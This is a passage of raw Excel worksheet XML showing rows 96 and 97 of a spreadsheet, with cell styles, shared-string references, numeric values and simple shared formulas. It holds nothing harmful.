        <v>13</v>
      </c>
      <c r="AG96" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH96" s="99" t="s">
        <v>1655</v>
      </c>
      <c r="AI96" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ96" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AK96" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AL96" s="100">
        <v>0.0</v>
      </c>
      <c r="AM96" s="100">
        <v>0.0</v>
      </c>
      <c r="AN96" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO96" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP96" s="100">
        <v>0.0</v>
      </c>
      <c r="AQ96" s="100">
        <v>0.0</v>
      </c>
      <c r="AR96" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS96" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT96" s="100" t="str">
        <f t="shared" si="158"/>
        <v>-</v>
      </c>
      <c r="AU96" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV96" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW96" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX96" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY96" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ96" s="100">
        <v>0.0</v>
      </c>
      <c r="BA96" s="102">
        <v>3.0</v>
      </c>
      <c r="BB96" s="102">
        <v>0.0</v>
      </c>
      <c r="BC96" s="102">
        <v>0.0</v>
      </c>
      <c r="BD96" s="102">
        <v>0.0</v>
      </c>
      <c r="BE96" s="102">
        <v>0.0</v>
      </c>
      <c r="BF96" s="102">
        <v>0.0</v>
      </c>
      <c r="BG96" s="102">
        <v>0.0</v>
      </c>
      <c r="BH96" s="102">
        <v>0.0</v>
      </c>
      <c r="BI96" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ96" s="102">
        <v>0.0</v>
      </c>
      <c r="BK96" s="102">
        <v>0.0</v>
      </c>
      <c r="BL96" s="103">
        <f t="shared" si="112"/>
        <v>0</v>
      </c>
      <c r="BM96" s="103">
        <f t="shared" si="113"/>
        <v>0</v>
      </c>
      <c r="BN96" s="103">
        <f t="shared" si="114"/>
        <v>0</v>
      </c>
      <c r="BO96" s="103">
        <f t="shared" si="115"/>
        <v>0</v>
      </c>
      <c r="BP96" s="103">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="BQ96" s="103">
        <f t="shared" si="117"/>
        <v>0</v>
      </c>
      <c r="BR96" s="103">
        <f t="shared" si="118"/>
        <v>0</v>
      </c>
      <c r="BS96" s="103">
        <f t="shared" si="119"/>
        <v>0</v>
      </c>
      <c r="BT96" s="103">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="BU96" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV96" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW96" s="104" t="s">
        <v>12</v>
      </c>
      <c r="BX96" s="104">
        <v>0.0</v>
      </c>
      <c r="BY96" s="104">
        <v>0.0</v>
      </c>
      <c r="BZ96" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA96" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CB96" s="104">
        <v>0.0</v>
      </c>
      <c r="CC96" s="104">
        <v>0.0</v>
      </c>
      <c r="CD96" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CE96" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF96" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CG96" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH96" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CI96" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ96" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK96" s="104">
        <v>0.0</v>
      </c>
      <c r="CL96" s="104">
        <v>0.0</v>
      </c>
      <c r="CM96" s="105">
        <v>3.0</v>
      </c>
      <c r="CN96" s="105">
        <v>0.0</v>
      </c>
      <c r="CO96" s="105">
        <v>0.0</v>
      </c>
      <c r="CP96" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ96" s="105">
        <v>0.0</v>
      </c>
      <c r="CR96" s="105">
        <v>0.0</v>
      </c>
      <c r="CS96" s="105">
        <v>0.0</v>
      </c>
      <c r="CT96" s="105">
        <v>0.0</v>
      </c>
      <c r="CU96" s="105">
        <v>0.0</v>
      </c>
      <c r="CV96" s="105">
        <v>0.0</v>
      </c>
      <c r="CW96" s="105">
        <v>0.0</v>
      </c>
      <c r="CX96" s="105">
        <v>0.0</v>
      </c>
      <c r="CY96" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ96" s="105">
        <v>0.0</v>
      </c>
      <c r="DA96" s="105">
        <v>0.0</v>
      </c>
      <c r="DB96" s="106">
        <f t="shared" si="122"/>
        <v>0</v>
      </c>
      <c r="DC96" s="106">
        <f t="shared" si="123"/>
        <v>0</v>
      </c>
      <c r="DD96" s="106">
        <f t="shared" si="124"/>
        <v>0</v>
      </c>
      <c r="DE96" s="106">
        <f t="shared" si="125"/>
        <v>0</v>
      </c>
      <c r="DF96" s="106">
        <f t="shared" si="126"/>
        <v>0</v>
      </c>
      <c r="DG96" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH96" s="106">
        <f t="shared" si="127"/>
        <v>0</v>
      </c>
      <c r="DI96" s="106">
        <f t="shared" si="128"/>
        <v>0</v>
      </c>
      <c r="DJ96" s="106">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="DK96" s="107">
        <f t="shared" si="104"/>
        <v>0</v>
      </c>
      <c r="DL96" s="106">
        <f t="shared" si="105"/>
        <v>0</v>
      </c>
      <c r="DM96" s="108" t="s">
        <v>1656</v>
      </c>
      <c r="DN96" s="108">
        <v>3.0</v>
      </c>
      <c r="DO96" s="108">
        <v>8.0</v>
      </c>
      <c r="DP96" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ96" s="108" t="s">
        <v>1657</v>
      </c>
      <c r="DR96" s="108">
        <v>3.0</v>
      </c>
      <c r="DS96" s="108">
        <v>8.0</v>
      </c>
      <c r="DT96" s="108" t="s">
        <v>1658</v>
      </c>
      <c r="DU96" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV96" s="108" t="str">
        <f t="shared" si="154"/>
        <v>50447, 50182, 50202</v>
      </c>
      <c r="DW96" s="108" t="s">
        <v>1659</v>
      </c>
      <c r="DX96" s="108">
        <v>50447.0</v>
      </c>
      <c r="DY96" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ96" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA96" s="108">
        <v>0.0</v>
      </c>
      <c r="EB96" s="108">
        <v>0.0</v>
      </c>
      <c r="EC96" s="109">
        <v>3.0</v>
      </c>
      <c r="ED96" s="109">
        <v>0.0</v>
      </c>
      <c r="EE96" s="109">
        <v>1.0</v>
      </c>
      <c r="EF96" s="109">
        <v>6.0</v>
      </c>
      <c r="EG96" s="109">
        <v>0.0</v>
      </c>
      <c r="EH96" s="109">
        <v>6.0</v>
      </c>
      <c r="EI96" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ96" s="109">
        <v>0.0</v>
      </c>
      <c r="EK96" s="109">
        <v>0.0</v>
      </c>
      <c r="EL96" s="109">
        <v>0.0</v>
      </c>
      <c r="EM96" s="109">
        <v>0.0</v>
      </c>
      <c r="EN96" s="109">
        <v>1.0</v>
      </c>
      <c r="EO96" s="109">
        <v>6.0</v>
      </c>
      <c r="EP96" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ96" s="109">
        <v>6.0</v>
      </c>
      <c r="ER96" s="110">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="ES96" s="110">
        <f t="shared" si="131"/>
        <v>0</v>
      </c>
      <c r="ET96" s="110">
        <f t="shared" si="132"/>
        <v>0</v>
      </c>
      <c r="EU96" s="110">
        <f t="shared" si="133"/>
        <v>1</v>
      </c>
      <c r="EV96" s="110">
        <f t="shared" si="134"/>
        <v>1</v>
      </c>
      <c r="EW96" s="110">
        <f t="shared" si="135"/>
        <v>0</v>
      </c>
      <c r="EX96" s="110">
        <f t="shared" si="136"/>
        <v>6</v>
      </c>
      <c r="EY96" s="110">
        <f t="shared" si="137"/>
        <v>6</v>
      </c>
      <c r="EZ96" s="110">
        <f t="shared" si="138"/>
        <v>0</v>
      </c>
      <c r="FA96" s="110">
        <f t="shared" si="106"/>
        <v>0</v>
      </c>
      <c r="FB96" s="110">
        <f t="shared" si="107"/>
        <v>0</v>
      </c>
      <c r="FC96" s="111" t="s">
        <v>1660</v>
      </c>
      <c r="FD96" s="111">
        <v>6.0</v>
      </c>
      <c r="FE96" s="111">
        <v>13.0</v>
      </c>
      <c r="FF96" s="101" t="s">
        <v>229</v>
      </c>
      <c r="FG96" s="111" t="s">
        <v>1661</v>
      </c>
      <c r="FH96" s="111">
        <v>4.0</v>
      </c>
      <c r="FI96" s="111">
        <v>7.0</v>
      </c>
      <c r="FJ96" s="111" t="s">
        <v>1662</v>
      </c>
      <c r="FK96" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FL96" s="111" t="str">
        <f t="shared" si="155"/>
        <v>50202, 50182, 50447, 2002752, 2002749</v>
      </c>
      <c r="FM96" s="111" t="s">
        <v>1663</v>
      </c>
      <c r="FN96" s="111" t="s">
        <v>1070</v>
      </c>
      <c r="FO96" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP96" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ96" s="111">
        <v>0.0</v>
      </c>
      <c r="FR96" s="111">
        <v>0.0</v>
      </c>
      <c r="FS96" s="112">
        <v>3.0</v>
      </c>
      <c r="FT96" s="112">
        <v>2.0</v>
      </c>
      <c r="FU96" s="112">
        <v>4.0</v>
      </c>
      <c r="FV96" s="112">
        <v>6.0</v>
      </c>
      <c r="FW96" s="112">
        <v>5.0</v>
      </c>
      <c r="FX96" s="112">
        <v>11.0</v>
      </c>
      <c r="FY96" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ96" s="112">
        <v>0.0</v>
      </c>
      <c r="GA96" s="112">
        <v>0.0</v>
      </c>
      <c r="GB96" s="112">
        <v>0.0</v>
      </c>
      <c r="GC96" s="112">
        <v>1.0</v>
      </c>
      <c r="GD96" s="112">
        <v>2.0</v>
      </c>
      <c r="GE96" s="112">
        <v>6.0</v>
      </c>
      <c r="GF96" s="112">
        <v>1.0</v>
      </c>
      <c r="GG96" s="112">
        <v>7.0</v>
      </c>
      <c r="GH96" s="113">
        <f t="shared" si="139"/>
        <v>2</v>
      </c>
      <c r="GI96" s="113">
        <f t="shared" si="140"/>
        <v>1</v>
      </c>
      <c r="GJ96" s="113">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="GK96" s="113">
        <f t="shared" si="142"/>
        <v>4</v>
      </c>
      <c r="GL96" s="113">
        <f t="shared" si="143"/>
        <v>2</v>
      </c>
      <c r="GM96" s="113">
        <f t="shared" si="144"/>
        <v>0</v>
      </c>
      <c r="GN96" s="113">
        <f t="shared" si="145"/>
        <v>11</v>
      </c>
      <c r="GO96" s="113">
        <f t="shared" si="146"/>
        <v>7</v>
      </c>
      <c r="GP96" s="113">
        <f t="shared" si="147"/>
        <v>0</v>
      </c>
      <c r="GQ96" s="114">
        <f t="shared" si="108"/>
        <v>0</v>
      </c>
      <c r="GR96" s="113">
        <f t="shared" si="109"/>
        <v>0</v>
      </c>
      <c r="GS96" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT96" s="94"/>
      <c r="GU96" s="116">
        <v>12449.0</v>
      </c>
      <c r="GV96" s="116">
        <v>1.0</v>
      </c>
      <c r="GW96" s="116">
        <v>1.0</v>
      </c>
      <c r="GX96" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY96" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ96" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA96" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB96" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC96" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD96" s="131">
        <v>12449.0</v>
      </c>
      <c r="HE96" s="131">
        <v>12449.0</v>
      </c>
      <c r="HF96" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG96" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH96" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI96" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ96" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK96" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL96" s="93">
        <v>3.0</v>
      </c>
      <c r="HM96" s="93">
        <f t="shared" si="83"/>
        <v>1</v>
      </c>
      <c r="HN96" s="93">
        <v>1.0</v>
      </c>
      <c r="HO96" s="93">
        <v>0.0</v>
      </c>
      <c r="HP96" s="93">
        <v>1.0</v>
      </c>
      <c r="HQ96" s="118">
        <f t="shared" si="53"/>
        <v>1</v>
      </c>
      <c r="HR96" s="118">
        <f t="shared" si="54"/>
        <v>1</v>
      </c>
      <c r="HS96" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT96" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU96" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV96" s="119" t="s">
        <v>1664</v>
      </c>
      <c r="HW96" s="119">
        <v>2.0</v>
      </c>
      <c r="HX96" s="119">
        <v>3.0</v>
      </c>
      <c r="HY96" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ96" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA96" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB96" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC96" s="120">
        <v>58463.0</v>
      </c>
      <c r="ID96" s="120" t="s">
        <v>1665</v>
      </c>
      <c r="IE96" s="120">
        <v>9999.0</v>
      </c>
      <c r="IF96" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG96" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH96" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II96" s="99" t="s">
        <v>1666</v>
      </c>
      <c r="IJ96" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK96" s="99">
        <v>2.0</v>
      </c>
      <c r="IL96" s="99">
        <v>1.0</v>
      </c>
      <c r="IM96" s="121">
        <f t="shared" si="159"/>
        <v>1</v>
      </c>
      <c r="IN96" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO96" s="98">
        <v>1.0</v>
      </c>
      <c r="IP96" s="123">
        <f t="shared" si="58"/>
        <v>1</v>
      </c>
      <c r="IQ96" s="118">
        <f t="shared" si="59"/>
        <v>1</v>
      </c>
      <c r="IR96" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS96" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT96" s="127"/>
      <c r="IU96" s="127"/>
      <c r="IV96" s="127"/>
      <c r="IW96" s="127"/>
      <c r="IX96" s="127"/>
      <c r="IY96" s="127"/>
      <c r="IZ96" s="127"/>
      <c r="JA96" s="127"/>
      <c r="JB96" s="127"/>
      <c r="JC96" s="127"/>
      <c r="JD96" s="127"/>
      <c r="JE96" s="127"/>
      <c r="JF96" s="127"/>
      <c r="JG96" s="127"/>
      <c r="JH96" s="127"/>
      <c r="JI96" s="127"/>
      <c r="JJ96" s="127"/>
      <c r="JK96" s="127"/>
      <c r="JL96" s="127"/>
      <c r="JM96" s="127"/>
      <c r="JN96" s="127"/>
      <c r="JO96" s="127"/>
      <c r="JP96" s="127"/>
      <c r="JQ96" s="127"/>
      <c r="JR96" s="127"/>
      <c r="JS96" s="127"/>
      <c r="JT96" s="127"/>
      <c r="JU96" s="127"/>
      <c r="JV96" s="127"/>
      <c r="JW96" s="127"/>
      <c r="JX96" s="127"/>
      <c r="JY96" s="127"/>
      <c r="JZ96" s="127"/>
      <c r="KA96" s="127"/>
      <c r="KB96" s="127"/>
      <c r="KC96" s="127"/>
      <c r="KD96" s="127"/>
      <c r="KE96" s="127"/>
      <c r="KF96" s="127"/>
      <c r="KG96" s="127"/>
      <c r="KH96" s="127"/>
      <c r="KI96" s="127"/>
      <c r="KJ96" s="127"/>
      <c r="KK96" s="127"/>
      <c r="KL96" s="127"/>
      <c r="KM96" s="127"/>
      <c r="KN96" s="127"/>
      <c r="KO96" s="127"/>
      <c r="KP96" s="127"/>
      <c r="KQ96" s="127"/>
      <c r="KR96" s="127"/>
      <c r="KS96" s="127"/>
      <c r="KT96" s="127"/>
      <c r="KU96" s="127"/>
      <c r="KV96" s="127"/>
      <c r="KW96" s="127"/>
      <c r="KX96" s="127"/>
      <c r="KY96" s="127"/>
      <c r="KZ96" s="127"/>
      <c r="LA96" s="127"/>
      <c r="LB96" s="127"/>
      <c r="LC96" s="127"/>
      <c r="LD96" s="127"/>
      <c r="LE96" s="127"/>
      <c r="LF96" s="127"/>
      <c r="LG96" s="127"/>
      <c r="LH96" s="127"/>
      <c r="LI96" s="127"/>
      <c r="LJ96" s="127"/>
      <c r="LK96" s="127"/>
      <c r="LL96" s="127"/>
      <c r="LM96" s="127"/>
      <c r="LN96" s="127"/>
      <c r="LO96" s="127"/>
      <c r="LP96" s="127"/>
      <c r="LQ96" s="127"/>
      <c r="LR96" s="127"/>
      <c r="LS96" s="127"/>
      <c r="LT96" s="127"/>
      <c r="LU96" s="127"/>
      <c r="LV96" s="127"/>
      <c r="LW96" s="127"/>
      <c r="LX96" s="127"/>
      <c r="LY96" s="127"/>
      <c r="LZ96" s="127"/>
      <c r="MA96" s="127"/>
      <c r="MB96" s="127"/>
      <c r="MC96" s="127"/>
      <c r="MD96" s="127"/>
      <c r="ME96" s="127"/>
      <c r="MF96" s="127"/>
      <c r="MG96" s="127"/>
      <c r="MH96" s="127"/>
      <c r="MI96" s="127"/>
      <c r="MJ96" s="127"/>
      <c r="MK96" s="127"/>
      <c r="ML96" s="127"/>
      <c r="MM96" s="127"/>
      <c r="MN96" s="127"/>
      <c r="MO96" s="127"/>
      <c r="MP96" s="127"/>
      <c r="MQ96" s="127"/>
      <c r="MR96" s="127"/>
      <c r="MS96" s="127"/>
      <c r="MT96" s="127"/>
      <c r="MU96" s="127"/>
      <c r="MV96" s="127"/>
      <c r="MW96" s="127"/>
      <c r="MX96" s="127"/>
      <c r="MY96" s="127"/>
      <c r="MZ96" s="127"/>
      <c r="NA96" s="127"/>
      <c r="NB96" s="127"/>
      <c r="NC96" s="127"/>
      <c r="ND96" s="127"/>
      <c r="NE96" s="127"/>
      <c r="NF96" s="127"/>
      <c r="NG96" s="127"/>
      <c r="NH96" s="127"/>
      <c r="NI96" s="127"/>
      <c r="NJ96" s="127"/>
      <c r="NK96" s="127"/>
      <c r="NL96" s="127"/>
      <c r="NM96" s="127"/>
      <c r="NN96" s="127"/>
      <c r="NO96" s="127"/>
      <c r="NP96" s="127"/>
      <c r="NQ96" s="127"/>
      <c r="NR96" s="127"/>
      <c r="NS96" s="127"/>
      <c r="NT96" s="127"/>
      <c r="NU96" s="127"/>
      <c r="NV96" s="127"/>
      <c r="NW96" s="127"/>
      <c r="NX96" s="127"/>
      <c r="NY96" s="127"/>
    </row>
    <row r="97" ht="153.75" customHeight="1">
      <c r="B97" s="89" t="s">
        <v>357</v>
      </c>
      <c r="C97" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D97" s="90" t="s">
        <v>358</v>
      </c>
      <c r="E97" s="90" t="s">
        <v>1667</v>
      </c>
      <c r="F97" s="90" t="s">
        <v>1668</v>
      </c>
      <c r="G97" s="90" t="s">
        <v>12</v>
      </c>
      <c r="H97" s="90" t="s">
        <v>12</v>
      </c>
      <c r="I97" s="92" t="s">
        <v>1669</v>
      </c>
      <c r="J97" s="92" t="s">
        <v>1670</v>
      </c>
      <c r="K97" s="92" t="s">
        <v>1671</v>
      </c>
      <c r="L97" s="93" t="s">
        <v>1672</v>
      </c>
      <c r="M97" s="93">
        <v>10.0</v>
      </c>
      <c r="N97" s="93">
        <v>1.0</v>
      </c>
      <c r="O97" s="93">
        <v>0.0</v>
      </c>
      <c r="P97" s="93">
        <v>1.0</v>
      </c>
      <c r="Q97" s="93">
        <f t="shared" si="160"/>
        <v>1</v>
      </c>
      <c r="R97" s="93">
        <v>1.0</v>
      </c>
      <c r="S97" s="93">
        <v>0.0</v>
      </c>
      <c r="T97" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U97" s="95" t="s">
        <v>219</v>
      </c>
      <c r="V97" s="161" t="s">
        <v>1673</v>
      </c>
      <c r="W97" s="96" t="s">
        <v>12</v>
      </c>
      <c r="X97" s="97" t="s">
        <v>1674</v>
      </c>
      <c r="Y97" s="96" t="s">
        <v>1675</v>
      </c>
      <c r="Z97" s="96" t="s">
        <v>1676</v>
      </c>
      <c r="AA97" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB97" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC97" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD97" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE97" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF97" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG97" s="98" t="s">
        <v>306</v>
      </c>
      <c r="AH97" s="99" t="s">
        <v>1677</v>
      </c>
      <c r="AI97" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ97" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK97" s="100" t="s">
        <v>1678</v>
      </c>
      <c r="AL97" s="100">
        <v>4.0</v>
      </c>
      <c r="AM97" s="100">
        <v>20.0</v>
      </c>
      <c r="AN97" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO97" s="100" t="s">
        <v>1678</v>
      </c>
      <c r="AP97" s="100">
        <v>4.0</v>
      </c>
      <c r="AQ97" s="100">
        <v>20.0</v>
      </c>
      <c r="AR97" s="100" t="s">
        <v>1678</v>
      </c>
      <c r="AS97" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT97" s="100" t="str">
        <f t="shared" si="158"/>
        <v>655, 1394, 1917, 3065</v>
      </c>
      <c r="AU97" s="100">
        <v>655.0</v>
      </c>
      <c r="AV97" s="100" t="s">
        <v>1679</v>
      </c>
      <c r="AW97" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX97" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY97" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ97" s="100">
        <v>0.0</v>
      </c>
      <c r="BA97" s="102">
        <v>10.0</v>
      </c>
      <c r="BB97" s="102">
        <v>1.0</v>
      </c>
      <c r="BC97" s="102">
        <v>5.0</v>
      </c>
      <c r="BD97" s="102">
        <v>20.0</v>
      </c>
      <c r="BE97" s="102">
        <v>0.0</v>
      </c>
      <c r="BF97" s="102">
        <v>0.0</v>
      </c>
      <c r="BG97" s="102">
        <v>0.0</v>
      </c>
      <c r="BH97" s="102">
        <v>0.0</v>
      </c>
      <c r="BI97" s="102">
        <v>1.0</v>
      </c>
      <c r="BJ97" s="102">
        <v>5.0</v>
      </c>
      <c r="BK97" s="102">
        <v>20.0</v>
      </c>
      <c r="BL97" s="103">
        <f t="shared" si="112"/>
        <v>1</v>
      </c>
      <c r="BM97" s="103">
        <f t="shared" si="113"/>
        <v>1</v>
      </c>
      <c r="BN97" s="103">
        <f t="shared" si="114"/>
        <v>0</v>
      </c>
      <c r="BO97" s="103">
        <f t="shared" si="115"/>
        <v>5</v>
      </c>
      <c r="BP97" s="103">
        <f t="shared" si="116"/>
        <v>5</v>
      </c>
      <c r="BQ97" s="103">
        <f t="shared" si="117"/>
        <v>0</v>
      </c>
      <c r="BR97" s="103">
        <f t="shared" si="118"/>
        <v>20</v>
      </c>
      <c r="BS97" s="103">
        <f t="shared" si="119"/>
        <v>20</v>
      </c>
      <c r="BT97" s="103">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="BU97" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV97" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW97" s="104" t="s">
        <v>1678</v>
      </c>
      <c r="BX97" s="104">
        <v>4.0</v>
      </c>
      <c r="BY97" s="104">
        <v>20.0</v>
      </c>
      <c r="BZ97" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA97" s="104" t="s">
        <v>1678</v>
      </c>
      <c r="CB97" s="104">
        <v>4.0</v>
      </c>
      <c r="CC97" s="104">
        <v>20.0</v>
      </c>
      <c r="CD97" s="104" t="s">
        <v>1678</v>
      </c>
      <c r="CE97" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF97" s="104" t="str">
        <f t="shared" ref="CF97:CF99" si="161">IF(CD97="-",CE97,CD97)</f>
        <v>655, 1394, 1917, 3065</v>
      </c>
      <c r="CG97" s="104">
        <v>655.0</v>
      </c>
      <c r="CH97" s="104" t="s">
        <v>1679</v>
      </c>
      <c r="CI97" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ97" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK97" s="104">
        <v>0.0</v>
      </c>
      <c r="CL97" s="104">
        <v>0.0</v>
      </c>
      <c r="CM97" s="105">
        <v>10.0</v>
      </c>
      <c r="CN97" s="105">
        <v>1.0</v>
      </c>
      <c r="CO97" s="105">
        <v>5.0</v>
      </c>
      <c r="CP97" s="105">
        <v>20.0</v>
      </c>
      <c r="CQ97" s="105">
        <v>0.0</v>
      </c>
      <c r="CR97" s="105">
        <v>20.0</v>
      </c>
      <c r="CS97" s="105">
        <v>0.0</v>
      </c>
      <c r="CT97" s="105">
        <v>0.0</v>
      </c>
      <c r="CU97" s="105">
        <v>0.0</v>
      </c>
      <c r="CV97" s="105">
        <v>0.0</v>
      </c>
      <c r="CW97" s="105">
        <v>1.0</v>
      </c>
      <c r="CX97" s="105">
        <v>5.0</v>
      </c>
      <c r="CY97" s="105">
        <v>20.0</v>
      </c>
      <c r="CZ97" s="105">
        <v>0.0</v>
      </c>
      <c r="DA97" s="105">
        <v>20.0</v>
      </c>
      <c r="DB97" s="106">
        <f t="shared" si="122"/>
        <v>1</v>
      </c>
      <c r="DC97" s="106">
        <f t="shared" si="123"/>
        <v>1</v>
      </c>
      <c r="DD97" s="106">
        <f t="shared" si="124"/>
        <v>0</v>
      </c>
      <c r="DE97" s="106">
        <f t="shared" si="125"/>
        <v>5</v>
      </c>
      <c r="DF97" s="106">
        <f t="shared" si="126"/>
        <v>5</v>
      </c>
      <c r="DG97" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH97" s="106">
        <f t="shared" si="127"/>
        <v>20</v>
      </c>
      <c r="DI97" s="106">
        <f t="shared" si="128"/>
        <v>20</v>
      </c>
      <c r="DJ97" s="106">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="DK97" s="107">
        <f t="shared" si="104"/>
        <v>0</v>
      </c>
      <c r="DL97" s="106">
        <f t="shared" si="105"/>
        <v>0</v>
      </c>
      <c r="DM97" s="108" t="s">
        <v>1680</v>
      </c>
      <c r="DN97" s="108">
        <v>6.0</v>
      </c>
      <c r="DO97" s="108">
        <v>23.0</v>
      </c>
      <c r="DP97" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ97" s="108" t="s">
        <v>1680</v>
      </c>
      <c r="DR97" s="108">
        <v>6.0</v>
      </c>
      <c r="DS97" s="108">
        <v>23.0</v>
      </c>
      <c r="DT97" s="108" t="s">
        <v>1680</v>
      </c>
      <c r="DU97" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV97" s="108" t="str">
        <f t="shared" si="154"/>
        <v>655, 1394, 1917, 3065, 38043, 23858</v>
      </c>
      <c r="DW97" s="108">
        <v>655.0</v>
      </c>
      <c r="DX97" s="108" t="s">
        <v>1681</v>
      </c>
      <c r="DY97" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ97" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA97" s="108">
        <v>0.0</v>
      </c>
      <c r="EB97" s="108">
        <v>0.0</v>
      </c>
      <c r="EC97" s="109">
        <v>10.0</v>
      </c>
      <c r="ED97" s="109">
        <v>1.0</v>
      </c>
      <c r="EE97" s="109">
        <v>5.0</v>
      </c>
      <c r="EF97" s="109">
        <v>23.0</v>
      </c>
      <c r="EG97" s="109">
        <v>0.0</v>
      </c>
      <c r="EH97" s="109">
        <v>23.0</v>
      </c>
      <c r="EI97" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ97" s="109">
        <v>0.0</v>
      </c>
      <c r="EK97" s="109">
        <v>0.0</v>
      </c>
      <c r="EL97" s="109">
        <v>0.0</v>
      </c>
      <c r="EM97" s="109">
        <v>1.0</v>
      </c>
      <c r="EN97" s="109">
        <v>5.0</v>
      </c>
      <c r="EO97" s="109">
        <v>23.0</v>
      </c>
      <c r="EP97" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ97" s="109">
        <v>23.0</v>
      </c>
      <c r="ER97" s="110">
        <f t="shared" si="130"/>
        <v>1</v>
      </c>
      <c r="ES97" s="110">
        <f t="shared" si="131"/>
        <v>1</v>
      </c>
      <c r="ET97" s="110">
        <f t="shared" si="132"/>
        <v>0</v>
      </c>
      <c r="EU97" s="110">
        <f t="shared" si="133"/>
        <v>5</v>
      </c>
      <c r="EV97" s="110">
        <f t="shared" si="134"/>
        <v>5</v>
      </c>
      <c r="EW97" s="110">
        <f t="shared" si="135"/>
